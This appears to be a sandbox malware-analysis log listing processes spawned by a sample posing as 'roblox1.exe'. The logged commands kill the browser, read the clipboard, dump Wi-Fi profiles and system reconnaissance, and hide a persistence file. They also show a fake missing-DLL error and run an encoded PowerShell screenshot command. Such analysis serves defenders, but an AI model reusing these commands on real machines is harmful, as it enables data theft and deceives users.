                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "chcp"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "chcp"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\systeminfo.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
                  Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiACkADQAKAGYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGUAZQBuAHMAaABvAHQAKABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdACQAYgBvAHUAbgBkAHMALAAgACQAcABhAHQAaAApACAAewANAAoAIAAgACAAJABiAG0AcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABiAG8AdQBuAGQAcwAuAHcAaQBkAHQAaAAsACAAJABiAG8AdQBuAGQAcwAuAGgAZQBpAGcAaAB0AA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQBwACkADQAKAA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoACQAYgBvAHUAbgBkAHMALgBMAG8AYwBhAHQAaQBvAG4ALAAgAFsARAByAGEAdwBpAG4AZwAuAFAAbwBpAG4AdABdADoAOgBFAG0AcAB0AHkALAAgACQAYgBvAHUAbgBkAHMALgBzAGkAegBlACkADQAKAA0ACgAgACAAIAAkAGIAbQBwAC4AUwBhAHYAZQAoACQAcABhAHQAaAApAA0ACgANAAoAIAAgACAAJABnAHIAYQBwAGgAaQBjAHMALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAJABiAG0AcAAuAEQAaQBzAHAAbwBzAGUAKAApAA0ACgB9AA0ACgANAAoAJABiAG8AdQBuAGQAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdADoAOgBGAHIAbwBtAEwAVABSAEIAKAAwACwAIAAwACwAIAAxADkAMgAwACwAIAAxADAAOAAwACkADQAKACQAcABhAHQAaAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQAgAC4AKQAuAEYAdQBsAGwATgBhAG0AZQArACIAXABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AcABuAGcAIgANAAoAcwBjAHIAZQBlAG4AcwBoAG8AdAAgACQAYgBvAHUAbgBkAHMAIAAkAHAAYQB0AGgA"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiACkADQAKAGYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGUAZQBuAHMAaABvAHQAKABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdACQAYgBvAHUAbgBkAHMALAAgACQAcABhAHQAaAApACAAewANAAoAIAAgACAAJABiAG0AcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABiAG8AdQBuAGQAcwAuAHcAaQBkAHQAaAAsACAAJABiAG8AdQBuAGQAcwAuAGgAZQBpAGcAaAB0AA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQBwACkADQAKAA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoACQAYgBvAHUAbgBkAHMALgBMAG8AYwBhAHQAaQBvAG4ALAAgAFsARAByAGEAdwBpAG4AZwAuAFAAbwBpAG4AdABdADoAOgBFAG0AcAB0AHkALAAgACQAYgBvAHUAbgBkAHMALgBzAGkAegBlACkADQAKAA0ACgAgACAAIAAkAGIAbQBwAC4AUwBhAHYAZQAoACQAcABhAHQAaAApAA0ACgANAAoAIAAgACAAJABnAHIAYQBwAGgAaQBjAHMALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAJABiAG0AcAAuAEQAaQBzAHAAbwBzAGUAKAApAA0ACgB9AA0ACgANAAoAJABiAG8AdQBuAGQAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdADoAOgBGAHIAbwBtAEwAVABSAEIAKAAwACwAIAAwACwAIAAxADkAMgAwACwAIAAxADAAOAAwACkADQAKACQAcABhAHQAaAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQAgAC4AKQAuAEYAdQBsAGwATgBhAG0AZQArACIAXABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AcABuAGcAIgANAAoAcwBjAHIAZQBlAG4AcwBoAG8AdAAgACQAYgBvAHUAbgBkAHMAIAAkAHAAYQB0AGgA
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                  Source: C:\Users\user\Desktop\roblox1.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe C:\Users\user\Desktop\roblox1.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe""Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "chcp"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "chcp"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiACkADQAKAGYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGUAZQBuAHMAaABvAHQAKABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdACQAYgBvAHUAbgBkAHMALAAgACQAcABhAHQAaAApACAAewANAAoAIAAgACAAJABiAG0AcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABiAG8AdQBuAGQAcwAuAHcAaQBkAHQAaAAsACAAJABiAG8AdQBuAGQAcwAuAGgAZQBpAGcAaAB0AA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQBwACkADQAKAA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoACQAYgBvAHUAbgBkAHMALgBMAG8AYwBhAHQAaQBvAG4ALAAgAFsARAByAGEAdwBpAG4AZwAuAFAAbwBpAG4AdABdADoAOgBFAG0AcAB0AHkALAAgACQAYgBvAHUAbgBkAHMALgBzAGkAegBlACkADQAKAA0ACgAgACAAIAAkAGIAbQBwAC4AUwBhAHYAZQAoACQAcABhAHQAaAApAA0ACgANAAoAIAAgACAAJABnAHIAYQBwAGgAaQBjAHMALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAJABiAG0AcAAuAEQAaQBzAHAAbwBzAGUAKAApAA0ACgB9AA0ACgANAAoAJABiAG8AdQBuAGQAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdADoAOgBGAHIAbwBtAEwAVABSAEIAKAAwACwAIAAwACwAIAAxADkAMgAwACwAIAAxADAAOAAwACkADQAKACQAcABhAHQAaAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQAgAC4AKQAuAEYAdQBsAGwATgBhAG0AZQArACIAXABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AcABuAGcAIgANAAoAcwBjAHIAZQBlAG4AcwBoAG8AdAAgACQAYgBvAHUAbgBkAHMAIAAkAHAAYQB0AGgA"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-ClipboardJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcpJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
                  Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiACkADQAKAGYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGUAZQBuAHMAaABvAHQAKABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdACQAYgBvAHUAbgBkAHMALAAgACQAcABhAHQAaAApACAAewANAAoAIAAgACAAJABiAG0AcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABiAG8AdQBuAGQAcwAuAHcAaQBkAHQAaAAsACAAJABiAG8AdQBuAGQAcwAuAGgAZQBpAGcAaAB0AA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQBwACkADQAKAA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoACQAYgBvAHUAbgBkAHMALgBMAG8AYwBhAHQAaQBvAG4ALAAgAFsARAByAGEAdwBpAG4AZwAuAFAAbwBpAG4AdABdADoAOgBFAG0AcAB0AHkALAAgACQAYgBvAHUAbgBkAHMALgBzAGkAegBlACkADQAKAA0ACgAgACAAIAAkAGIAbQBwAC4AUwBhAHYAZQAoACQAcABhAHQAaAApAA0ACgANAAoAIAAgACAAJABnAHIAYQBwAGgAaQBjAHMALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAJABiAG0AcAAuAEQAaQBzAHAAbwBzAGUAKAApAA0ACgB9AA0ACgANAAoAJABiAG8AdQBuAGQAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdADoAOgBGAHIAbwBtAEwAVABSAEIAKAAwACwAIAAwACwAIAAxADkAMgAwACwAIAAxADAAOAAwACkADQAKACQAcABhAHQAaAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQAgAC4AKQAuAEYAdQBsAGwATgBhAG0AZQArACIAXABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AcABuAGcAIgANAAoAcwBjAHIAZQBlAG4AcwBoAG8AdAAgACQAYgBvAHUAbgBkAHMAIAAkAHAAYQB0AGgA
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\roblox1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: python310.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: libffi-7.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: sqlite3.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: python3.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: libcrypto-1_1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: libssl-1_1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeSection loaded: dpapi.dllJump to behavior
